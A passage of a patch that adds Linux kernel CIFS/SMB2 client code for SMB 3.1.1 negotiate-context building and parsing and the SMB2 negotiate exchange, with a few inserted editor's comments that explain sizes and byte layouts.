++static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
++				 struct TCP_Server_Info *server,
++				 void **request_buf, unsigned int *total_len)
++{
++	/* BB eventually switch this to SMB2 specific small buf size */
++	if (smb2_command == SMB2_SET_INFO)
++		*request_buf = cifs_buf_get();
++	else
++		*request_buf = cifs_small_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++
++	fill_small_buf(smb2_command, tcon, server,
++		       (struct smb2_hdr *)(*request_buf),
++		       total_len);
++
++	if (tcon != NULL) {
++		uint16_t com_code = le16_to_cpu(smb2_command);
++		cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_sent[com_code]);
++		cifs_stats_inc(&tcon->num_smbs_sent);
++	}
++
++	return 0;
++}
++
++static int smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
++			       struct TCP_Server_Info *server,
++			       void **request_buf, unsigned int *total_len)
++{
++	int rc;
++
++	rc = smb2_reconnect(smb2_command, tcon, server);
++	if (rc)
++		return rc;
++
++	return __smb2_plain_req_init(smb2_command, tcon, server, request_buf,
++				     total_len);
++}
++
++static int smb2_ioctl_req_init(u32 opcode, struct cifs_tcon *tcon,
++			       struct TCP_Server_Info *server,
++			       void **request_buf, unsigned int *total_len)
++{
++	/* Skip reconnect only for FSCTL_VALIDATE_NEGOTIATE_INFO IOCTLs */
++	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO) {
++		return __smb2_plain_req_init(SMB2_IOCTL, tcon, server,
++					     request_buf, total_len);
++	}
++	return smb2_plain_req_init(SMB2_IOCTL, tcon, server,
++				   request_buf, total_len);
++}
++
++/* For explanation of negotiate contexts see MS-SMB2 section 2.2.3.1 */
++
++static void
++build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(38);
++	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
++	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
++	pneg_ctxt->HashAlgorithms = SMB2_PREAUTH_INTEGRITY_SHA512;
++}
++
++static void
++build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
++			  - sizeof(struct smb2_neg_context));
++	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(3);
++	pneg_ctxt->CompressionAlgorithms[0] = SMB3_COMPRESS_LZ77;
++	pneg_ctxt->CompressionAlgorithms[1] = SMB3_COMPRESS_LZ77_HUFF;
++	pneg_ctxt->CompressionAlgorithms[2] = SMB3_COMPRESS_LZNT1;
++}
++
++static unsigned int
++build_signing_ctxt(struct smb2_signing_capabilities *pneg_ctxt)
++{
++	unsigned int ctxt_len = sizeof(struct smb2_signing_capabilities);
++	unsigned short num_algs = 1; /* number of signing algorithms sent */
++
++	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
++	/*
++	 * Context Data length must be rounded to a multiple of 8 for some servers
++	 */
++	pneg_ctxt->DataLength = cpu_to_le16(ALIGN(sizeof(struct smb2_signing_capabilities) -
++					    sizeof(struct smb2_neg_context) +
++					    (num_algs * sizeof(u16)), 8));
++	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(num_algs);
++	pneg_ctxt->SigningAlgorithms[0] = cpu_to_le16(SIGNING_ALG_AES_CMAC);
++
++	ctxt_len += sizeof(__le16) * num_algs;
++	ctxt_len = ALIGN(ctxt_len, 8);
++	return ctxt_len;
++	/* TBD add SIGNING_ALG_AES_GMAC and/or SIGNING_ALG_HMAC_SHA256 */
++}
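++
++/*
++ * Worked example (editor's note, not part of the upstream patch), assuming
++ * an 8-byte struct smb2_neg_context header and a 10-byte fixed part of
++ * struct smb2_signing_capabilities: with num_algs = 1 the variable payload
++ * is 2 (SigningAlgorithmCount) + 2 (one algorithm) = 4 bytes, so
++ * DataLength = ALIGN(4, 8) = 8 and the context consumes
++ * ctxt_len = ALIGN(10 + 2, 8) = 16 bytes of the request.
++ */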
++
++static void
++build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
++	if (require_gcm_256) {
++		pneg_ctxt->DataLength = cpu_to_le16(4); /* Cipher Count + 1 cipher */
++		pneg_ctxt->CipherCount = cpu_to_le16(1);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES256_GCM;
++	} else if (enable_gcm_256) {
++		pneg_ctxt->DataLength = cpu_to_le16(8); /* Cipher Count + 3 ciphers */
++		pneg_ctxt->CipherCount = cpu_to_le16(3);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
++		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES256_GCM;
++		pneg_ctxt->Ciphers[2] = SMB2_ENCRYPTION_AES128_CCM;
++	} else {
++		pneg_ctxt->DataLength = cpu_to_le16(6); /* Cipher Count + 2 ciphers */
++		pneg_ctxt->CipherCount = cpu_to_le16(2);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
++		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES128_CCM;
++	}
++}
++
++static unsigned int
++build_netname_ctxt(struct smb2_netname_neg_context *pneg_ctxt, char *hostname)
++{
++	struct nls_table *cp = load_nls_default();
++
++	pneg_ctxt->ContextType = SMB2_NETNAME_NEGOTIATE_CONTEXT_ID;
++
++	/* copy up to the first 100 bytes of the server name to the NetName field */
++	pneg_ctxt->DataLength = cpu_to_le16(2 * cifs_strtoUTF16(pneg_ctxt->NetName, hostname, 100, cp));
++	/* context size is DataLength + minimal smb2_neg_context */
++	return ALIGN(le16_to_cpu(pneg_ctxt->DataLength) + sizeof(struct smb2_neg_context), 8);
++}
++
++static void
++build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
++	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	pneg_ctxt->Name[0] = 0x93;
++	pneg_ctxt->Name[1] = 0xAD;
++	pneg_ctxt->Name[2] = 0x25;
++	pneg_ctxt->Name[3] = 0x50;
++	pneg_ctxt->Name[4] = 0x9C;
++	pneg_ctxt->Name[5] = 0xB4;
++	pneg_ctxt->Name[6] = 0x11;
++	pneg_ctxt->Name[7] = 0xE7;
++	pneg_ctxt->Name[8] = 0xB4;
++	pneg_ctxt->Name[9] = 0x23;
++	pneg_ctxt->Name[10] = 0x83;
++	pneg_ctxt->Name[11] = 0xDE;
++	pneg_ctxt->Name[12] = 0x96;
++	pneg_ctxt->Name[13] = 0x8B;
++	pneg_ctxt->Name[14] = 0xCD;
++	pneg_ctxt->Name[15] = 0x7C;
++}
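++
++/*
++ * Editor's note (illustrative, not part of the upstream patch): the 16
++ * Name bytes above are the SMB2_CREATE_TAG_POSIX GUID
++ * 93AD2550-9CB4-11E7-B423-83DE968BCD7C written out byte-for-byte in wire
++ * order, from Name[0] = 0x93 through Name[15] = 0x7C.
++ */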
++
++static void
++assemble_neg_contexts(struct smb2_negotiate_req *req,
++		      struct TCP_Server_Info *server, unsigned int *total_len)
++{
++	unsigned int ctxt_len, neg_context_count;
++	struct TCP_Server_Info *pserver;
++	char *pneg_ctxt;
++	char *hostname;
++
++	if (*total_len > 200) {
++		/* If the length is corrupted, don't overrun the smb buffer */
++		cifs_server_dbg(VFS, "Bad frame length assembling neg contexts\n");
++		return;
++	}
++
++	/*
++	 * round up total_len of fixed part of SMB3 negotiate request to 8
++	 * byte boundary before adding negotiate contexts
++	 */
++	*total_len = ALIGN(*total_len, 8);
++
++	pneg_ctxt = (*total_len) + (char *)req;
++	req->NegotiateContextOffset = cpu_to_le32(*total_len);
++
++	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt);
++	ctxt_len = ALIGN(sizeof(struct smb2_preauth_neg_context), 8);
++	*total_len += ctxt_len;
++	pneg_ctxt += ctxt_len;
++
++	build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt);
++	ctxt_len = ALIGN(sizeof(struct smb2_encryption_neg_context), 8);
++	*total_len += ctxt_len;
++	pneg_ctxt += ctxt_len;
++
++	/*
++	 * secondary channels don't have the hostname field populated;
++	 * use the hostname field in the primary channel instead
++	 */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	cifs_server_lock(pserver);
++	hostname = pserver->hostname;
++	if (hostname && (hostname[0] != 0)) {
++		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
++					      hostname);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count = 3;
++	} else
++		neg_context_count = 2;
++	cifs_server_unlock(pserver);
++
++	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
++	*total_len += sizeof(struct smb2_posix_neg_context);
++	pneg_ctxt += sizeof(struct smb2_posix_neg_context);
++	neg_context_count++;
++
++	if (server->compress_algorithm) {
++		build_compression_ctxt((struct smb2_compression_capabilities_context *)
++				pneg_ctxt);
++		ctxt_len = ALIGN(sizeof(struct smb2_compression_capabilities_context), 8);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count++;
++	}
++
++	if (enable_negotiate_signing) {
++		ctxt_len = build_signing_ctxt((struct smb2_signing_capabilities *)
++				pneg_ctxt);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count++;
++	}
++
++	/* check for and add transport_capabilities and signing capabilities */
++	req->NegotiateContextCount = cpu_to_le16(neg_context_count);
++
++}
++
++/* If the preauth context is invalid, warn but use what we requested, SHA-512 */
++static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
++	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
++		pr_warn_once("server sent bad preauth context\n");
++		return;
++	} else if (len < MIN_PREAUTH_CTXT_DATA_LEN + le16_to_cpu(ctxt->SaltLength)) {
++		pr_warn_once("server sent invalid SaltLength\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->HashAlgorithmCount) != 1)
++		pr_warn_once("Invalid SMB3 hash algorithm count\n");
++	if (ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		pr_warn_once("unknown SMB3 hash algorithm\n");
++}
++
++static void decode_compress_ctx(struct TCP_Server_Info *server,
++			 struct smb2_compression_capabilities_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
++	if (len < 10) {
++		pr_warn_once("server sent bad compression cntxt\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->CompressionAlgorithmCount) != 1) {
++		pr_warn_once("Invalid SMB3 compress algorithm count\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->CompressionAlgorithms[0]) > 3) {
++		pr_warn_once("unknown compression algorithm\n");
++		return;
++	}
++	server->compress_algorithm = ctxt->CompressionAlgorithms[0];
++}
++
++static int decode_encrypt_ctx(struct TCP_Server_Info *server,
++			      struct smb2_encryption_neg_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
++	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
++		pr_warn_once("server sent bad crypto ctxt len\n");
++		return -EINVAL;
++	}
++
++	if (le16_to_cpu(ctxt->CipherCount) != 1) {
++		pr_warn_once("Invalid SMB3.11 cipher count\n");
++		return -EINVAL;
++	}
++	cifs_dbg(FYI, "SMB311 cipher type:%d\n", le16_to_cpu(ctxt->Ciphers[0]));
++	if (require_gcm_256) {
++		if (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM) {
++			cifs_dbg(VFS, "Server does not support requested encryption type (AES256 GCM)\n");
++			return -EOPNOTSUPP;
++		}
++	} else if (ctxt->Ciphers[0] == 0) {
++		/*
++		 * e.g. if the server only supported AES256_CCM (very unlikely),
++		 * supported no encryption types, or had them all disabled.
++		 * Since GLOBAL_CAP_ENCRYPTION will not be set, if the mount
++		 * requested encryption ("seal"), checks later on during tree
++		 * connection will return the proper rc.  But if seal was not
++		 * requested by the client, we can't fail here, since the
++		 * server is allowed to return 0 to indicate no supported
++		 * cipher.
++		 */
++		server->cipher_type = 0;
++		server->capabilities &= ~SMB2_GLOBAL_CAP_ENCRYPTION;
++		pr_warn_once("Server does not support requested encryption types\n");
++		return 0;
++	} else if ((ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_CCM) &&
++		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_GCM) &&
++		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM)) {
++		/* server returned a cipher we didn't ask for */
++		pr_warn_once("Invalid SMB3.11 cipher returned\n");
++		return -EINVAL;
++	}
++	server->cipher_type = ctxt->Ciphers[0];
++	server->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++	return 0;
++}
++
++static void decode_signing_ctx(struct TCP_Server_Info *server,
++			       struct smb2_signing_capabilities *pctxt)
++{
++	unsigned int len = le16_to_cpu(pctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
++	if ((len < 4) || (len > 16)) {
++		pr_warn_once("server sent bad signing negcontext\n");
++		return;
++	}
++	if (le16_to_cpu(pctxt->SigningAlgorithmCount) != 1) {
++		pr_warn_once("Invalid signing algorithm count\n");
++		return;
++	}
++	if (le16_to_cpu(pctxt->SigningAlgorithms[0]) > 2) {
++		pr_warn_once("unknown signing algorithm\n");
++		return;
++	}
++
++	server->signing_negotiated = true;
++	server->signing_algorithm = le16_to_cpu(pctxt->SigningAlgorithms[0]);
++	cifs_dbg(FYI, "signing algorithm %d chosen\n",
++		     server->signing_algorithm);
++}
++
++
++static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
++				     struct TCP_Server_Info *server,
++				     unsigned int len_of_smb)
++{
++	struct smb2_neg_context *pctx;
++	unsigned int offset = le32_to_cpu(rsp->NegotiateContextOffset);
++	unsigned int ctxt_cnt = le16_to_cpu(rsp->NegotiateContextCount);
++	unsigned int len_of_ctxts, i;
++	int rc = 0;
++
++	cifs_dbg(FYI, "decoding %d negotiate contexts\n", ctxt_cnt);
++	if (len_of_smb <= offset) {
++		cifs_server_dbg(VFS, "Invalid response: negotiate context offset\n");
++		return -EINVAL;
++	}
++
++	len_of_ctxts = len_of_smb - offset;
++
++	for (i = 0; i < ctxt_cnt; i++) {
++		int clen;
++		/* check that offset is not beyond end of SMB */
++		if (len_of_ctxts < sizeof(struct smb2_neg_context))
++			break;
++
++		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
++		if (clen > len_of_ctxts)
++			break;
++
++		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES)
++			decode_preauth_context(
++				(struct smb2_preauth_neg_context *)pctx);
++		else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES)
++			rc = decode_encrypt_ctx(server,
++				(struct smb2_encryption_neg_context *)pctx);
++		else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES)
++			decode_compress_ctx(server,
++				(struct smb2_compression_capabilities_context *)pctx);
++		else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE)
++			server->posix_ext_supported = true;
++		else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES)
++			decode_signing_ctx(server,
++				(struct smb2_signing_capabilities *)pctx);
++		else
++			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
++				le16_to_cpu(pctx->ContextType));
++		if (rc)
++			break;
++
++		offset += clen;
++		len_of_ctxts -= clen;
++	}
++	return rc;
++}
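++
++/*
++ * Editor's note (illustrative, not part of the upstream patch): per
++ * MS-SMB2 2.2.4 each context after the first begins at the next 8-byte
++ * aligned offset, which is why the loop advances by ALIGN(clen, 8) for
++ * every context except the last.  E.g. a 46-byte preauth context (8-byte
++ * header + 38 bytes of data) is followed by the next context 48 bytes
++ * later.
++ */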
++
++static struct create_posix *
++create_posix_buf(umode_t mode)
++{
++	struct create_posix *buf;
++
++	buf = kzalloc(sizeof(struct create_posix),
++			GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset =
++		cpu_to_le16(offsetof(struct create_posix, Mode));
++	buf->ccontext.DataLength = cpu_to_le32(4);
++	buf->ccontext.NameOffset =
++		cpu_to_le16(offsetof(struct create_posix, Name));
++	buf->ccontext.NameLength = cpu_to_le16(16);
++
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	buf->Name[0] = 0x93;
++	buf->Name[1] = 0xAD;
++	buf->Name[2] = 0x25;
++	buf->Name[3] = 0x50;
++	buf->Name[4] = 0x9C;
++	buf->Name[5] = 0xB4;
++	buf->Name[6] = 0x11;
++	buf->Name[7] = 0xE7;
++	buf->Name[8] = 0xB4;
++	buf->Name[9] = 0x23;
++	buf->Name[10] = 0x83;
++	buf->Name[11] = 0xDE;
++	buf->Name[12] = 0x96;
++	buf->Name[13] = 0x8B;
++	buf->Name[14] = 0xCD;
++	buf->Name[15] = 0x7C;
++	buf->Mode = cpu_to_le32(mode);
++	cifs_dbg(FYI, "mode on posix create 0%o\n", mode);
++	return buf;
++}
++
++static int
++add_posix_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_posix_buf(mode);
++	if (mode == ACL_NO_MODE)
++		cifs_dbg(FYI, "Invalid mode\n");
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_posix);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_posix));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++
++/*
++ *
++ *	SMB2 Worker functions follow:
++ *
++ *	The general structure of the worker functions is:
++ *	1) Call smb2_init (assembles SMB2 header)
++ *	2) Initialize SMB2 command specific fields in fixed length area of SMB
++ *	3) Call smb_sendrcv2 (sends request on socket and waits for response)
++ *	4) Decode SMB2 command specific fields in the fixed length area
++ *	5) Decode variable length data area (if any for this SMB2 command type)
++ *	6) Call free smb buffer
++ *	7) return
++ *
++ */
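++
++/*
++ * Skeletal sketch of that pattern (editor's note, not part of the
++ * upstream patch; SMB2_FOO is a hypothetical command):
++ *
++ *	rc = smb2_plain_req_init(SMB2_FOO, tcon, server,
++ *				 (void **)&req, &total_len);
++ *	// ...fill command-specific fields, point rqst.rq_iov at req...
++ *	rc = cifs_send_recv(xid, ses, server, &rqst, &resp_buftype,
++ *			    flags, &rsp_iov);
++ *	cifs_small_buf_release(req);
++ *	// ...decode fixed and variable length areas of the response...
++ *	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++ */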
++
++int
++SMB2_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	struct smb_rqst rqst;
++	struct smb2_negotiate_req *req;
++	struct smb2_negotiate_rsp *rsp;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int rc;
++	int resp_buftype;
++	int blob_offset, blob_length;
++	char *security_blob;
++	int flags = CIFS_NEG_OP;
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "Negotiate protocol\n");
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	rc = smb2_plain_req_init(SMB2_NEGOTIATE, NULL, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.SessionId = 0;
++
++	memset(server->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
++	memset(ses->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
++
++	if (strcmp(server->vals->version_string,
++		   SMB3ANY_VERSION_STRING) == 0) {
++		req->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
++		req->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
++		req->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
++		req->DialectCount = cpu_to_le16(3);
++		total_len += 6;
++	} else if (strcmp(server->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		req->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
++		req->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
++		req->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
++		req->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
++		req->DialectCount = cpu_to_le16(4);
++		total_len += 8;
++	} else {
++		/* otherwise send specific dialect */
++		req->Dialects[0] = cpu_to_le16(server->vals->protocol_id);
++		req->DialectCount = cpu_to_le16(1);
++		total_len += 2;
++	}
++
++	/* only one of SMB2 signing flags may be set in SMB2 request */
++	if (ses->sign)
++		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
++	else if (global_secflags & CIFSSEC_MAY_SIGN)
++		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
++	else
++		req->SecurityMode = 0;
++
++	req->Capabilities = cpu_to_le32(server->vals->req_capabilities);
++	if (ses->chan_max > 1)
++		req->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
++
++	/* ClientGUID must be zero for SMB2.02 dialect */
++	if (server->vals->protocol_id == SMB20_PROT_ID)
++		memset(req->ClientGUID, 0, SMB2_CLIENT_GUID_SIZE);
++	else {
++		memcpy(req->ClientGUID, server->client_guid,
++			SMB2_CLIENT_GUID_SIZE);
++		if ((server->vals->protocol_id == SMB311_PROT_ID) ||
++		    (strcmp(server->vals->version_string,
++		     SMB3ANY_VERSION_STRING) == 0) ||
++		    (strcmp(server->vals->version_string,
++		     SMBDEFAULT_VERSION_STRING) == 0))
++			assemble_neg_contexts(req, server, &total_len);
++	}
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	rsp = (struct smb2_negotiate_rsp *)rsp_iov.iov_base;
++	/*
++	 * No tcon so can't do
++	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
++	 */
++	if (rc == -EOPNOTSUPP) {
++		cifs_server_dbg(VFS, "Dialect not supported by server. Consider  specifying vers=1.0 or vers=2.0 on mount for accessing older servers\n");
++		goto neg_exit;
++	} else if (rc != 0)
++		goto neg_exit;
++
++	rc = -EIO;
++	if (strcmp(server->vals->version_string,
++		   SMB3ANY_VERSION_STRING) == 0) {
++		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2.1 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++			/* ops were set to 3.0 by default, so update for 3.1.1 */
++			server->ops = &smb311_operations;
++			server->vals = &smb311_values;
++		}
++	} else if (strcmp(server->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
++			/* ops were set to 3.0 by default, so update for 2.1 */
++			server->ops = &smb21_operations;
++			server->vals = &smb21_values;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++			server->ops = &smb311_operations;
++			server->vals = &smb311_values;
++		}
++	} else if (le16_to_cpu(rsp->DialectRevision) !=
++				server->vals->protocol_id) {
++		/* if a single dialect was requested, ensure the returned dialect matches */
++		cifs_server_dbg(VFS, "Invalid 0x%x dialect returned: not requested\n",
++				le16_to_cpu(rsp->DialectRevision));
++		goto neg_exit;
++	}
++
++	cifs_dbg(FYI, "mode 0x%x\n", rsp->SecurityMode);
++
++	if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb2.0 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb2.1 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB30_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.0 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB302_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.02 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.1.1 dialect\n");
++	else {
++		cifs_server_dbg(VFS, "Invalid dialect returned by server 0x%x\n",
++				le16_to_cpu(rsp->DialectRevision));
++		goto neg_exit;
++	}
++
++	rc = 0;
++	server->dialect = le16_to_cpu(rsp->DialectRevision);
++
++	/*
++	 * Keep a copy of the hash after negprot. This hash will be
++	 * the starting hash value for all sessions made from this
++	 * server.
++	 */
++	memcpy(server->preauth_sha_hash, ses->preauth_sha_hash,
++	       SMB2_PREAUTH_HASH_SIZE);
++
++	/* SMB2 only has an extended negflavor */
++	server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
++	/* set it to the maximum buffer size value we can send with 1 credit */
++	server->maxBuf = min_t(unsigned int, le32_to_cpu(rsp->MaxTransactSize),
++			       SMB2_MAX_BUFFER_SIZE);
++	server->max_read = le32_to_cpu(rsp->MaxReadSize);
++	server->max_write = le32_to_cpu(rsp->MaxWriteSize);
++	server->sec_mode = le16_to_cpu(rsp->SecurityMode);
++	if ((server->sec_mode & SMB2_SEC_MODE_FLAGS_ALL) != server->sec_mode)
++		cifs_dbg(FYI, "Server returned unexpected security mode 0x%x\n",
++				server->sec_mode);
++	server->capabilities = le32_to_cpu(rsp->Capabilities);
++	/* Internal types */
++	server->capabilities |= SMB2_NT_FIND | SMB2_LARGE_FILES;
++
++	/*
++	 * SMB3.0 supports only 1 cipher and doesn't have an encryption neg context.
++	 * Set the cipher type manually.
++	 */
++	if (server->dialect == SMB30_PROT_ID && (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		server->cipher_type = SMB2_ENCRYPTION_AES128_CCM;
++
++	security_blob = smb2_get_data_area_len(&blob_offset, &blob_length,
++					       (struct smb2_hdr *)rsp);
++	/*
++	 * See MS-SMB2 section 2.2.4: if no blob, client picks default which
++	 * for us will be
++	 *	ses->sectype = RawNTLMSSP;
++	 * but for the time being this is our only auth choice so it doesn't matter.
++	 * We just found a server which sets blob length to zero expecting raw.
++	 */
++	if (blob_length == 0) {
++		cifs_dbg(FYI, "missing security blob on negprot\n");
++		server->sec_ntlmssp = true;
++	}
++
++	rc = cifs_enable_signing(server, ses->sign);
++	if (rc)
++		goto neg_exit;
++	if (blob_length) {
++		rc = decode_negTokenInit(security_blob, blob_length, server);
++		if (rc == 1)
++			rc = 0;
++		else if (rc == 0)
++			rc = -EIO;
++	}
++
++	if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++		if (rsp->NegotiateContextCount)
++			rc = smb311_decode_neg_context(rsp, server,
++						       rsp_iov.iov_len);
++		else
++			cifs_server_dbg(VFS, "Missing expected negotiate contexts\n");
++	}
++neg_exit:
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int smb3_validate_negotiate(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	int rc;
++	struct validate_negotiate_info_req *pneg_inbuf;
++	struct validate_negotiate_info_rsp *pneg_rsp = NULL;
++	u32 rsplen;
++	u32 inbuflen; /* max of 4 dialects */
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	cifs_dbg(FYI, "validate negotiate\n");
++
